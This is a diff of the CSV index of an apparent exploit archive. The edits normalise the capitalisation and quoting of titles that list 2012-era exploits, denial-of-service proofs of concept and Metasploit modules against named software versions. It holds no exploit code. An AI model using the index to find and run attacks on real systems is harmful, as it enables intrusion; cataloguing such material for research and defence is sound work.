18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 - Memory Corruption",2012-04-19,shinnai,multiple,dos,0 -18755,platforms/windows/dos/18755.c,"Windows - afd.sys PoC (MS11-046)",2012-04-19,fb1h2s,windows,dos,0 +18755,platforms/windows/dos/18755.c,"Microsoft Windows - 'afd.sys' PoC (MS11-046)",2012-04-19,fb1h2s,windows,dos,0 18756,platforms/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",multiple,dos,0 -18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 - (.mp4) Crash (PoC)",2012-04-19,"Senator of Pirates",windows,dos,0 +18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 - '.mp4' Crash (PoC)",2012-04-19,"Senator of Pirates",windows,dos,0 18758,platforms/multiple/dos/18758.txt,"Wireshark - 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0 18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow",2012-04-20,Metasploit,windows,remote,0 18760,platforms/windows/local/18760.rb,"xRadio 0.95b - Buffer Overflow",2012-04-20,Metasploit,windows,local,0 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution",2012-04-20,Metasploit,linux,remote,0 18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 -18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x WebDAV - File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0 -18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 - (build 12) Multiple Cross-Site Scripting",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 +18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x - WebDAV File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0 +18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18765,platforms/windows/dos/18765.txt,"samsung net-i ware 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0 18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST Cross-Site Request Forgery",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18768,platforms/php/webapps/18768.txt,"Mega File Manager - File Download",2012-04-22,"i2sec-Min Gi Jo",php,webapps,0 -18780,platforms/windows/remote/18780.rb,"Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,Metasploit,windows,remote,0 +18780,platforms/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,Metasploit,windows,remote,0 18770,platforms/php/webapps/18770.txt,"vtiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0 18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Yılmaz",php,webapps,0 18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 - Buffer Overflow",2012-04-23,shinnai,windows,dos,0 18775,platforms/php/webapps/18775.php,"WebCalendar 1.2.4 - (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0 18776,platforms/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,windows,dos,0 18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter - Integer Overflow",2012-04-24,"Akita Software Security",windows,dos,0 -18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php p parameter' SQL Injection",2012-04-24,G13,php,webapps,0 +18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php p Parameter' SQL Injection",2012-04-24,G13,php,webapps,0 18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,hardware,remote,0 18781,platforms/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 - Buffer Overflow",2012-04-25,Metasploit,windows,local,0 18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0 18783,platforms/linux/local/18783.txt,"mount.cifs - chdir() Arbitrary Root File Identification",2012-04-25,Sha0,linux,local,0 -18788,platforms/php/webapps/18788.txt,"PHP volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 +18788,platforms/php/webapps/18788.txt,"PHP Volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0 -18787,platforms/php/webapps/18787.txt,"Wordpress Zingiri Web Shop Plugin 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 -18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Pre-Authenticated Remote Code Injection",2012-04-29,Metasploit,linux,webapps,0 +18787,platforms/php/webapps/18787.txt,"WordPress Zingiri Web Shop Plugin 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 +18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Pre-Authentication Remote Code Injection",2012-04-29,Metasploit,linux,webapps,0 18798,platforms/php/webapps/18798.txt,"Soco CMS - Local File Inclusion",2012-04-29,"BHG Security Center",php,webapps,0 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 -18791,platforms/php/webapps/18791.txt,"Wordpress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0 +18791,platforms/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0 18792,platforms/windows/local/18792.rb,"CPE17 Autorun Killer 1.7.1 - Stack Buffer Overflow (Metasploit)",2012-04-27,"Xenithz xpt",windows,local,0 18793,platforms/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection",2012-04-27,"H4ckCity Secuirty TeaM",php,webapps,0 -18833,platforms/windows/remote/18833.rb,"Solarwinds Storage Manager 5.1.0 - SQL Injection",2012-05-04,Metasploit,windows,remote,0 +18833,platforms/windows/remote/18833.rb,"SolarWinds Storage Manager 5.1.0 - SQL Injection",2012-05-04,Metasploit,windows,remote,0 18795,platforms/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - '.mp4' Denial of Service",2012-04-27,"Senator of Pirates",windows,dos,0 18800,platforms/php/webapps/18800.txt,"Alienvault OSSIM Open Source SIEM 3.1 - Multiple Security Vulnerabilities",2012-04-29,"Stefan Schurtz",php,webapps,0 18801,platforms/php/webapps/18801.txt,"Car Portal CMS 3.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 @@ -16276,17 +16277,17 @@ id,file,description,date,author,platform,type,port 18803,platforms/php/webapps/18803.txt,"Opial CMS 2.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18804,platforms/php/webapps/18804.txt,"DIY CMS 1.0 Poll - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0 -18806,platforms/php/webapps/18806.txt,"Wordpress Zingiri Web Shop Plugin 2.4.2 - Persistent Cross-Site Scripting",2012-05-01,"Mehmet Ince",php,webapps,0 +18806,platforms/php/webapps/18806.txt,"WordPress Zingiri Web Shop Plugin 2.4.2 - Persistent Cross-Site Scripting",2012-05-01,"Mehmet Ince",php,webapps,0 18814,platforms/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - SEH Overwrite",2012-05-01,blake,windows,local,0 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injections",2012-05-01,Vulnerability-Lab,php,webapps,0 18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 - GetObject",2012-05-01,Metasploit,windows,remote,0 18813,platforms/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 -18815,platforms/php/webapps/18815.txt,"STRATO Newsletter Manager - Directory Traversal",2012-05-01,"Zero X",php,webapps,0 +18815,platforms/php/webapps/18815.txt,"STRATO NewsLetter Manager - Directory Traversal",2012-05-01,"Zero X",php,webapps,0 18816,platforms/windows/dos/18816.py,"LAN Messenger 1.2.28 - Denial of Service",2012-05-01,"Julien Ahrens",windows,dos,0 18817,platforms/hardware/dos/18817.py,"Mikrotik Router - Denial of Service",2012-05-01,PoURaN,hardware,dos,0 -18818,platforms/windows/remote/18818.py,"Solarwinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection",2012-05-01,muts,windows,remote,0 -18819,platforms/windows/dos/18819.cpp,"Microsoft Windows XP - win32k.sys Local Kernel Denial of Service",2012-05-02,"Lufeng Li",windows,dos,0 +18818,platforms/windows/remote/18818.py,"SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection",2012-05-01,muts,windows,remote,0 +18819,platforms/windows/dos/18819.cpp,"Microsoft Windows XP - 'win32k.sys' Local Kernel Denial of Service",2012-05-02,"Lufeng Li",windows,dos,0 18820,platforms/php/webapps/18820.php,"OpenConf 4.11 - (author/edit.php) Blind SQL Injection",2012-05-02,EgiX,php,webapps,0 18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere - Insecure File Permissions Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0 18824,platforms/cgi/webapps/18824.txt,"Websense Triton - Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0 @@ -16312,13 +16313,13 @@ id,file,description,date,author,platform,type,port 18845,platforms/php/webapps/18845.txt,"PHP Agenda 2.2.8 - SQL Injection",2012-05-07,loneferret,php,webapps,0 18847,platforms/windows/remote/18847.rb,"Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access",2012-05-09,Metasploit,windows,remote,0 18850,platforms/php/webapps/18850.txt,"X7 Chat 2.0.5.1 - Cross-Site Request Forgery (Add Admin) Exploit",2012-05-09,DennSpec,php,webapps,0 -18851,platforms/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 - (.gpx) Crash (PoC)",2012-05-09,condis,windows,dos,0 +18851,platforms/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 - '.gpx' Crash (PoC)",2012-05-09,condis,windows,dos,0 18852,platforms/windows/dos/18852.txt,"DecisionTools SharpGrid - ActiveX Control Remote Code Execution",2012-05-09,"Francis Provencher",windows,dos,0 -18853,platforms/windows/dos/18853.txt,"SAP Netweaver Dispatcher - Multiple Vulnerabilities",2012-05-09,"Core Security",windows,dos,0 +18853,platforms/windows/dos/18853.txt,"SAP NetWeaver Dispatcher - Multiple Vulnerabilities",2012-05-09,"Core Security",windows,dos,0 18865,platforms/php/webapps/18865.rb,"WikkaWiki 1.3.2 - Spam Logging PHP Injection",2012-05-12,Metasploit,php,webapps,0 18855,platforms/linux/dos/18855.txt,"Asterisk - 'ast_parse_digest()' Stack Buffer Overflow",2012-03-15,"Russell Bryant",linux,dos,0 18857,platforms/php/webapps/18857.txt,"Kerio WinRoute Firewall Web Server < 6 - Source Code Disclosure",2012-05-10,"Andrey Komarov",php,webapps,0 -18858,platforms/php/webapps/18858.txt,"elearning server 4g - Multiple Vulnerabilities",2012-05-10,"Andrey Komarov",php,webapps,0 +18858,platforms/php/webapps/18858.txt,"eLearning server 4g - Multiple Vulnerabilities",2012-05-10,"Andrey Komarov",php,webapps,0 18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution",2012-05-12,Metasploit,windows,remote,0 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0 18868,platforms/php/webapps/18868.txt,"Sockso 1.51 - Persistent Cross-Site Scripting",2012-05-12,"Ciaran McNally",php,webapps,0 @@ -16327,7 +16328,7 @@ id,file,description,date,author,platform,type,port 18873,platforms/php/webapps/18873.txt,"Viscacha Forum CMS 0.8.1.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18874,platforms/php/webapps/18874.txt,"Free Realty 3.1-0.6 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18875,platforms/php/webapps/18875.txt,"Galette - 'picture.php' SQL Injection",2012-05-13,sbz,php,webapps,0 -18879,platforms/windows/dos/18879.rb,"Multimedia Builder 4.9.8 - '.mef' Denial of Service",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 +18879,platforms/windows/dos/18879.rb,"MultiMedia Builder 4.9.8 - '.mef' Denial of Service",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 - SVG Browser Java Code Execution",2012-05-19,Metasploit,multiple,remote,0 18877,platforms/multiple/dos/18877.txt,"FlexNet License Server Manager - Stack Overflow In lmgrd",2012-05-14,"Luigi Auriemma",multiple,dos,0 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 @@ -16338,20 +16339,20 @@ id,file,description,date,author,platform,type,port 18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 - Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0 18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 - Database Backup Disclosure Exploit",2012-05-16,LiquidWorm,php,webapps,0 18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0 -18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce",2012-05-21,condis,php,dos,0 +18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 18893,platforms/hardware/remote/18893.py,"HP VSA - Remote Command Execution Exploit",2012-02-17,"Nicolas Gregoire",hardware,remote,0 -18894,platforms/windows/dos/18894.txt,"Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034)",2012-05-18,Cr4sh,windows,dos,0 +18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034)",2012-05-18,Cr4sh,windows,dos,0 18898,platforms/php/remote/18898.rb,"Active Collab 'chat module' <= 2.3.8 - Remote PHP Code Injection",2012-05-19,Metasploit,php,remote,0 18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector - POST Request Buffer Overflow",2012-05-19,Metasploit,windows,remote,0 18899,platforms/php/webapps/18899.txt,"PHP Address Book 7.0.0 - Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",php,webapps,0 18900,platforms/php/webapps/18900.txt,"FreeNAC 3.02 - SQL Injection / Cross-Site Scripting",2012-05-19,blake,php,webapps,0 18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 - Virtual SAN Appliance Command Execution",2012-05-21,Metasploit,hardware,remote,0 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 -18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - .DAL File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 +18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 -18911,platforms/php/webapps/18911.txt,"Vanilla Forums About Me Plugin - Persistant Cross-Site Scripting",2012-05-21,"Henry Hoggard",php,webapps,0 -18912,platforms/php/webapps/18912.txt,"Vanilla FirstLastNames 1.3.2 Plugin - Persistant Cross-Site Scripting",2012-05-21,"Henry Hoggard",php,webapps,0 +18911,platforms/php/webapps/18911.txt,"Vanilla Forums About Me Plugin - Persistent Cross-Site Scripting",2012-05-21,"Henry Hoggard",php,webapps,0 +18912,platforms/php/webapps/18912.txt,"Vanilla FirstLastNames 1.3.2 Plugin - Persistent Cross-Site Scripting",2012-05-21,"Henry Hoggard",php,webapps,0 18913,platforms/php/webapps/18913.php,"Supernews 2.6.1 - SQL Injection",2012-05-21,WhiteCollarGroup,php,webapps,0 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow",2012-05-21,Metasploit,windows,local,0 18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0 @@ -16366,7 +16367,7 @@ id,file,description,date,author,platform,type,port 18921,platforms/php/webapps/18921.txt,"Jaow 2.4.5 - Blind SQL Injection",2012-05-24,kallimero,php,webapps,0 18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow",2012-05-25,Metasploit,windows,local,0 18926,platforms/windows/dos/18926.php,"bsnes 0.87 - Local Denial of Service",2012-05-25,"Yakir Wizman",windows,dos,0 -18927,platforms/php/webapps/18927.txt,"socialengine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0 +18927,platforms/php/webapps/18927.txt,"SocialEngine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 - Log Entry sprintf() Buffer Overflow",2012-05-25,Metasploit,windows,remote,0 18950,platforms/php/webapps/18950.txt,"NewsAdd 1.0 - Multiple SQL Injections",2012-05-30,WhiteCollarGroup,php,webapps,0 18931,platforms/ios/dos/18931.rb,"iOS 5.1.1 - Safari Browser - JS match() & search() Crash (PoC)",2012-05-25,"Alberto Ortega",ios,dos,0 @@ -16381,12 +16382,12 @@ id,file,description,date,author,platform,type,port 18946,platforms/windows/dos/18946.txt,"TFTPD32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,windows,dos,0 18940,platforms/windows/dos/18940.php,"LibreOffice 3.5.3 - '.rtf' FileOpen Crash",2012-05-28,shinnai,windows,dos,0 18941,platforms/php/webapps/18941.txt,"PHP Volunteer Management System 1.0.2 - Multiple Vulnerabilities",2012-05-28,Ashoo,php,webapps,0 -18947,platforms/windows/local/18947.rb,"ispVM System - .XCF File Handling Overflow",2012-05-29,Metasploit,windows,local,0 +18947,platforms/windows/local/18947.rb,"ispVM System - '.XCF' File Handling Overflow",2012-05-29,Metasploit,windows,local,0 18948,platforms/php/webapps/18948.txt,"PBBoard 2.1.4 - Multiple SQL Injections",2012-05-29,loneferret,php,webapps,0 19025,platforms/windows/remote/19025.rb,"Sielco Sistemi Winlog 2.07.14 - Buffer Overflow",2012-06-08,Metasploit,windows,remote,0 18952,platforms/windows/dos/18952.txt,"Microsoft Wordpad 5.1 - '.doc' Null Pointer Dereference",2012-05-30,condis,windows,dos,0 18953,platforms/php/webapps/18953.txt,"Ganesha Digital Library 4.0 - Multiple Vulnerabilities",2012-05-30,X-Cisadane,php,webapps,0 -18954,platforms/windows/local/18954.rb,"MPlayer - .SAMI Subtitle File Buffer Overflow",2012-05-30,Metasploit,windows,local,0 +18954,platforms/windows/local/18954.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow",2012-05-30,Metasploit,windows,local,0 18955,platforms/php/webapps/18955.txt,"Simple Web Content Management System 1.1-1.3 - Multiple SQL Injections",2012-05-30,loneferret,php,webapps,0 18956,platforms/windows/dos/18956.c,"GIMP 2.6 script-fu < 2.8.0 - Buffer Overflow",2012-05-31,"Joseph Sheridan",windows,dos,0 18957,platforms/php/webapps/18957.rb,"PHP Volunteer Management System 1.0.2 - Arbitrary File Upload",2012-05-31,Metasploit,php,webapps,0 @@ -16397,52 +16398,52 @@ id,file,description,date,author,platform,type,port 18962,platforms/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,windows,dos,0 18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 18968,platforms/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020006 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 -18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 +18964,platforms/windows/dos/18964.txt,"Irfanview 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 18970,platforms/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps,0 18965,platforms/php/webapps/18965.html,"4PSA VoIPNow Professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 -18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 +18972,platforms/windows/dos/18972.txt,"Irfanview 4.33 - Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 18973,platforms/windows/remote/18973.rb,"GIMP - script-fu Server Buffer Overflow",2012-06-02,Metasploit,windows,remote,0 18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Persistent Cross-Site Scripting",2012-06-02,"Henry Hoggard",php,webapps,0 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 -18987,platforms/php/webapps/18987.php,"Wordpress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 -18988,platforms/php/webapps/18988.php,"Wordpress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 -18989,platforms/php/webapps/18989.php,"Wordpress Google Maps via Store Locator Plugin 2.7.1 < 3.0.1 - Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps,0 -18990,platforms/php/webapps/18990.php,"Wordpress HTML5 AV Manager Plugin 0.2.7 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 -18991,platforms/php/webapps/18991.php,"Wordpress Foxypress Plugin 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 +18987,platforms/php/webapps/18987.php,"WordPress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 +18988,platforms/php/webapps/18988.php,"WordPress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 +18989,platforms/php/webapps/18989.php,"WordPress Google Maps via Store Locator Plugin 2.7.1 < 3.0.1 - Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps,0 +18990,platforms/php/webapps/18990.php,"WordPress HTML5 AV Manager Plugin 0.2.7 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 +18991,platforms/php/webapps/18991.php,"WordPress Foxypress Plugin 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer - Multiple ActiveX BackupToAvi() Remote Overflow",2012-06-08,Metasploit,windows,remote,0 -18993,platforms/php/webapps/18993.php,"Wordpress Asset Manager Plugin 0.2 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 -18994,platforms/php/webapps/18994.php,"Wordpress Font Uploader Plugin 1.2.4 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 +18993,platforms/php/webapps/18993.php,"WordPress Asset Manager Plugin 0.2 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 +18994,platforms/php/webapps/18994.php,"WordPress Font Uploader Plugin 1.2.4 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 19026,platforms/windows/remote/19026.rb,"Microsoft IIS - MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,Metasploit,windows,remote,0 -18997,platforms/php/webapps/18997.php,"Wordpress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 -18998,platforms/php/webapps/18998.php,"Wordpress Gallery Plugin 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 +18997,platforms/php/webapps/18997.php,"WordPress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 +18998,platforms/php/webapps/18998.php,"WordPress Gallery Plugin 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18999,platforms/php/webapps/18999.php,"SN News 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,windows,dos,0 -19012,platforms/php/webapps/19012.txt,"Wordpress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 -19013,platforms/php/webapps/19013.txt,"Wordpress Easy Contact Forms Export Plugin 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19012,platforms/php/webapps/19012.txt,"WordPress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 +19013,platforms/php/webapps/19013.txt,"WordPress Easy Contact Forms Export Plugin 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19005,platforms/php/webapps/19005.txt,"SN News 1.2 - (/admin/loger.php) Authentication Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0 19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Exploit",2012-06-07,b33f,windows,local,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows - OLE Object File Handling Remote Code Execution",2012-06-06,Metasploit,windows,remote,0 19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting",2012-06-06,"Henry Hoggard",php,webapps,0 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution",2012-06-10,Metasploit,windows,remote,0 19007,platforms/php/webapps/19007.php,"PHPNet 1.8 - (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0 -19008,platforms/php/webapps/19008.php,"Wordpress Front End Upload 0.5.3 Plugin - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 -19009,platforms/php/webapps/19009.php,"Wordpress Omni Secure Files Plugin 0.1.13 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 -19016,platforms/php/webapps/19016.txt,"Wordpress PICA Photo Gallery Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19008,platforms/php/webapps/19008.php,"WordPress Front End Upload 0.5.3 Plugin - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 +19009,platforms/php/webapps/19009.php,"WordPress Omni Secure Files Plugin 0.1.13 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 +19016,platforms/php/webapps/19016.txt,"WordPress PICA Photo Gallery Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19029,platforms/php/webapps/19029.py,"phpAcounts 0.5.3 - SQL Injection",2012-06-08,loneferret,php,webapps,0 -19018,platforms/php/webapps/19018.txt,"Wordpress Plugin: Newsletter 1.5 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 -19019,platforms/php/webapps/19019.php,"Wordpress RBX Gallery Plugin 2.1 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 -19020,platforms/php/webapps/19020.txt,"Wordpress Simple Download Button Shortcode Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 -19021,platforms/php/webapps/19021.txt,"Wordpress Thinkun Remind Plugin 1.1.3 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 -19022,platforms/php/webapps/19022.txt,"Wordpress Tinymce Thumbnail Gallery Plugin 1.0.7 - Remote File Disclosure",2012-06-08,"Sammy 